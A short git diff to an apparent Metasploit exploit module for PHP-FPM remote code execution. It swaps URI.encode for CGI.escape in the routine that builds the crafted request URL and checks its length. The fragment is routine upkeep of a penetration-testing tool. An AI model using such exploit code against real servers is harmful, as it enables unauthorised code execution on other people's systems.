diff --git a/modules/exploits/multi/http/php_fpm_rce.rb b/modules/exploits/multi/http/php_fpm_rce.rb
index ff20c3e507..aeff464f59 100644
--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -126,8 +126,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_crafted_request(path:, qsl: datastore['MinQSL'], customh_length: 1, cmd: '', allow_retry: true)
-    uri = URI.encode(normalize_uri(target_uri.path, path)).gsub(/([?&])/, {'?'=>'%3F', '&'=>'%26'})
-    qsl_delta = uri.length - path.length - URI.encode(target_uri.path).length
+    uri = CGI.escape(normalize_uri(target_uri.path, path)).gsub(/([?&])/, {'?'=>'%3F', '&'=>'%26'})
+    qsl_delta = uri.length - path.length - CGI.escape(target_uri.path).length
     if qsl_delta.odd?
       fail_with Failure::Unknown, "Got odd qslDelta, that means the URL encoding gone wrong: path=#{path}, qsl_delta=#{qsl_delta}"
     end